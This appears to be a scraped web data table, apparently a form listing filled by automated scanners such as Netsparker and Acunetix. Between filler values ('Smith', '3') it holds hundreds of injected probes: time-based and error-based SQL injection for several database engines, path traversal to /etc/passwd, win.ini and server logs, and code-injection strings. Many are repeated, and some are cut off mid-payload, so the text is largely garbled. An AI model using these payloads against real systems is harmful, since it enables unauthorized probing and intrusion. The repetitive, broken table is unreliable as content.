3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
</a style=x:expre/**/ssion(netsparker(0x00353C))> |
| ');WAITFOR DELAY '0:0:25'-- |
Smith |
3 |
3 |
3 |
| Smith |
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr |
3 |
3 |
3 |
| Smith |
eval('print 0xFFF9999-22') |
3 |
3 |
3 |
| ../../../../../../../../../../proc/self/fd/2 |
Smith |
3 |
3 |
3 |
| '));WAITFOR DELAY '0:0:25'-- |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
*/netsparker(0x003546);/* |
| Smith |
Smith |
3 |
3 |
3 |
| ../../../../../../../../../../proc/self/fd/2 .php |
Smith |
3 |
3 |
3 |
| 1));WAITFOR DELAY '0:0:25'-- |
Smith |
3 |
3 |
3 |
| Smith |
'+print 0xFFF9999-22+' |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
'+netsparker(0x00354C)+' |
| ../../../../../../../../../../etc/httpd/logs/error.log |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
"+print 0xFFF9999-22+" |
3 |
3 |
3 |
| 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48 |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
"+netsparker(0x003551)+" |
| ../../../../../../../../../../etc/httpd/logs/error_log |
Smith |
3 |
3 |
3 |
| 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+ |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
',netsparker(0x003558),' |
| ../../../../../../../../../../var/log/apache2/error.log |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
netsparker(0x00355F) |
| 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48) |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| ../../../../../../../../../../var/log/apache/error.log |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
netsparker(0x003564); |
| syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48) |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| ../../../../../../../../../../proc/self/version |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| -1 AND (SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25))-- 1 |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| ../../../../../../../../../../proc/self/version .php |
Smith |
3 |
3 |
3 |
| (select sleep(25))a-- 1 |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| ../../../../../../../../../../../etc/passwd |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||ch |
Smith |
3 |
3 |
3 |
| ../../../../../../../../../../../etc/passwd |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(6 |
Smith |
3 |
3 |
3 |
| ../../../../../../../../../../../etc/passwd .php |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| ';SELECT pg_sleep(25)-- |
Smith |
3 |
3 |
3 |
| ns../../../../../../../../../../etc/passwd/././././././././././. |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| 1;SELECT pg_sleep(25)-- |
Smith |
3 |
3 |
3 |
| /../../../../../../../../../../../etc/passwd |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| SELECT pg_sleep(25)-- |
Smith |
3 |
3 |
3 |
| /etc/passwd |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| registration |
Smith |
3 |
3 |
3 |
| 1);SELECT pg_sleep(25)-- |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| ');SELECT pg_sleep(25)-- |
Smith |
3 |
3 |
3 |
| registration |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| '));SELECT pg_sleep(25)-- |
Smith |
3 |
3 |
3 |
| data:;base64,TlM3NzU0NTYxNDQ2NTc1 |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| 1));SELECT pg_sleep(25)-- |
Smith |
3 |
3 |
3 |
| Smith |
../../../../../../../../../../boot.ini |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
response.write(268409241-22)' |
| 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64) |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
../../../../../../../../../../boot.ini .php |
3 |
3 |
3 |
| (SELECT 1 FROM (SELECT SLEEP(25))A) |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
+response.write(268409241-22)' |
| Smith |
/../../../../../../../../../../boot.ini |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
"+response.write(268409241-22)+" |
| Smith |
Smith |
3 |
3 |
%27 |
| '+(SELECT 1 FROM (SELECT SLEEP(25))A)+' |
Smith |
3 |
3 |
3 |
| Smith |
file:/windows/win.ini |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
<% response.write(268409241-22) %> |
| Smith |
Smith |
3 |
3 |
(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) |
| -1' or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+' |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
print(int)0xFFF9999-22 |
| Smith |
../../../../../../../../../../windows/win.ini |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
+print(int)0xFFF9999-22;// |
| -1 or 1=(SELECT 1 FROM (SELECT SLEEP(25))A) |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +' |
| Smith |
../../../../../../../../../../windows/win.ini .php |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
'+print(int)0xFFF9999-22+' |
| -1" or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+" |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) |
| Smith |
c:\windows\win.ini |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
"+print(int)0xFFF9999-22+" |
| Smith |
';WAITFOR DELAY '0:0:25'-- |
3 |
3 |
3 |
| Smith |
../../../../../../../../../../windows/iis6.log |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
'+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +' |
| Smith |
Smith |
3 |
3 |
<? print(int)0xFFF9999-22;//?> |
| Smith |
1;WAITFOR DELAY '0:0:25'-- |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+' |
| Smith |
Smith |
3 |
3 |
{php}print(int)0xFFF9999-22;{/php} |
| Smith |
../../../../../../../../../../proc/self/fd/2 |
3 |
3 |
3 |
| Smith |
1);WAITFOR DELAY '0:0:25'-- |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
-1 or 1=1 and (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) |
| Smith |
../../../../../../../../../../proc/self/fd/2 .php |
3 |
3 |
3 |
| Smith |
');WAITFOR DELAY '0:0:25'-- |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
'{${print(int)0xFFF9999-22}}' |
| Smith |
Smith |
3 |
3 |
-1' or 1=1+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' |
| Smith |
../../../../../../../../../../etc/httpd/logs/error.log |
3 |
3 |
3 |
| Smith |
'));WAITFOR DELAY '0:0:25'-- |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
[php]print(int)0xFFF9999-22;[/php] |
| Smith |
../../../../../../../../../../etc/httpd/logs/error_log |
3 |
3 |
3 |
| Smith |
1));WAITFOR DELAY '0:0:25'-- |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
-1" or 1=1+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+" |
| Smith |
Smith |
3 |
3 |
print 0xFFF9999-22 |
| Smith |
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48 |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))) |
| Smith |
Smith |
3 |
3 |
eval('print 0xFFF9999-22') |
| Smith |
../../../../../../../../../../var/log/apache2/error.log |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric) |
| Smith |
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+ |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
'+print 0xFFF9999-22+' |
| Smith |
../../../../../../../../../../var/log/apache/error.log |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||' |
| Smith |
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48) |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
"+print 0xFFF9999-22+" |
| Smith |
../../../../../../../../../../proc/self/version |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL) |
| Smith |
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48) |
3 |
3 |
3 |
| Smith |
-1 AND (SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25))-- 1 |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
NSFTW |
| Smith |
../../../../../../../../../../proc/self/version .php |
3 |
3 |
3 |
| Smith |
../../../../../../../../../../../etc/passwd |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
'+NSFTW+' |
| Smith |
(select sleep(25))a-- 1 |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) |
| Smith |
../../../../../../../../../../../etc/passwd |
3 |
3 |
3 |
| Smith |
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||ch |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
-1'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' |
| Smith |
../../../../../../../../../../../etc/passwd .php |
3 |
3 |
3 |
| Smith |
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(6 |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1 |
| Smith |
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpas |
3 |
3 |
3 |
| Smith |
';SELECT pg_sleep(25)-- |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))) |
| Smith |
ns../../../../../../../../../../etc/passwd/././././././././././. |
3 |
3 |
3 |
| Smith |
1;SELECT pg_sleep(25)-- |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||' |
| Smith |
/../../../../../../../../../../../etc/passwd |
3 |
3 |
3 |
| Smith |
SELECT pg_sleep(25)-- |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
/etc/passwd |
3 |
3 |
3 |
| Smith |
1);SELECT pg_sleep(25)-- |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
registration |
3 |
3 |
3 |
| Smith |
');SELECT pg_sleep(25)-- |
3 |
3 |
3 |
| Smith |
registration |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
'));SELECT pg_sleep(25)-- |
3 |
3 |
3 |
| Smith |
1));SELECT pg_sleep(25)-- |
3 |
3 |
3 |
| Smith |
data:;base64,TlM3NzU0NTYxNDQ2NTc1 |
3 |
3 |
3 |
| Smith |
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64) |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
(SELECT 1 FROM (SELECT SLEEP(25))A) |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
'+(SELECT 1 FROM (SELECT SLEEP(25))A)+' |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
-1' or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+' |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
-1 or 1=(SELECT 1 FROM (SELECT SLEEP(25))A) |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
-1" or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+" |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
../../../../../../../../../../boot.ini |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
../../../../../../../../../../boot.ini .php |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
/../../../../../../../../../../boot.ini |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
file:/windows/win.ini |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
../../../../../../../../../../windows/win.ini |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
../../../../../../../../../../windows/win.ini .php |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
c:\windows\win.ini |
| Smith |
Smith |
3 |
3 |
../../../../../../../../../../windows/iis6.log |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
../../../../../../../../../../proc/self/fd/2 |
| Smith |
Smith |
3 |
3 |
';WAITFOR DELAY '0:0:25'-- |
| Smith |
Smith |
3 |
3 |
../../../../../../../../../../proc/self/fd/2 .php |
| Smith |
Smith |
3 |
3 |
1;WAITFOR DELAY '0:0:25'-- |
| Smith |
Smith |
3 |
3 |
WAITFOR DELAY '0:0:25'-- |
| Smith |
Smith |
3 |
3 |
../../../../../../../../../../etc/httpd/logs/error.log |
| Smith |
Smith |
3 |
3 |
1);WAITFOR DELAY '0:0:25'-- |
| Smith |
Smith |
3 |
3 |
../../../../../../../../../../etc/httpd/logs/error_log |
| Smith |
Smith |
3 |
3 |
');WAITFOR DELAY '0:0:25'-- |
| Smith |
Smith |
3 |
3 |
../../../../../../../../../../var/log/apache2/error.log |
| Smith |
Smith |
3 |
3 |
'));WAITFOR DELAY '0:0:25'-- |
| Smith |
Smith |
3 |
3 |
../../../../../../../../../../var/log/apache/error.log |
| Smith |
Smith |
3 |
3 |
1));WAITFOR DELAY '0:0:25'-- |
| Smith |
Smith |
3 |
3 |
../../../../../../../../../../proc/self/version |
| Smith |
Smith |
3 |
3 |
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
| Smith |
Smith |
3 |
3 |
../../../../../../../../../../proc/self/version .php |
| Smith |
Smith |
3 |
3 |
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
| Smith |
Smith |
3 |
3 |
../../../../../../../../../../../etc/passwd |
| Smith |
Smith |
3 |
3 |
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
| Smith |
Smith |
3 |
3 |
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
| Smith |
Smith |
3 |
3 |
../../../../../../../../../../../etc/passwd |
| Smith |
Smith |
3 |
3 |
-1 AND (SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25))-- 1 |
| Smith |
Smith |
3 |
3 |
../../../../../../../../../../../etc/passwd .php |
| Smith |
Smith |
3 |
3 |
(select sleep(25))a-- 1 |
| Smith |
Smith |
3 |
3 |
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd |
| Smith |
Smith |
3 |
3 |
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) |
| Smith |
Smith |
3 |
3 |
ns../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ |
| Smith |
Smith |
3 |
3 |
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' |
| Smith |
Smith |
3 |
3 |
/../../../../../../../../../../../etc/passwd |
| Smith |
Smith |
3 |
3 |
';SELECT pg_sleep(25)-- |
| Smith |
Smith |
3 |
3 |
/etc/passwd |
| Smith |
Smith |
3 |
3 |
1;SELECT pg_sleep(25)-- |
| Smith |
Smith |
3 |
3 |
SELECT pg_sleep(25)-- |
| Smith |
Smith |
3 |
3 |
registration |
| Smith |
Smith |
3 |
3 |
1);SELECT pg_sleep(25)-- |
| Smith |
Smith |
3 |
3 |
registration |
| Smith |
Smith |
3 |
3 |
');SELECT pg_sleep(25)-- |
| Smith |
Smith |
3 |
3 |
data:;base64,TlM3NzU0NTYxNDQ2NTc1 |
| Smith |
Smith |
3 |
3 |
'));SELECT pg_sleep(25)-- |
| Smith |
Smith |
3 |
3 |
1));SELECT pg_sleep(25)-- |
| Smith |
Smith |
3 |
3 |
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 |
| Smith |
Smith |
3 |
3 |
(SELECT 1 FROM (SELECT SLEEP(25))A) |
| Smith |
Smith |
3 |
3 |
'+(SELECT 1 FROM (SELECT SLEEP(25))A)+' |
| Smith |
Smith |
3 |
3 |
-1' or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+' |
| Smith |
Smith |
3 |
3 |
-1 or 1=(SELECT 1 FROM (SELECT SLEEP(25))A) |
| Smith |
Smith |
3 |
3 |
-1" or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+" |
| nevppiyh |
rvhmobcp |
Acunetix |
20 |
1 |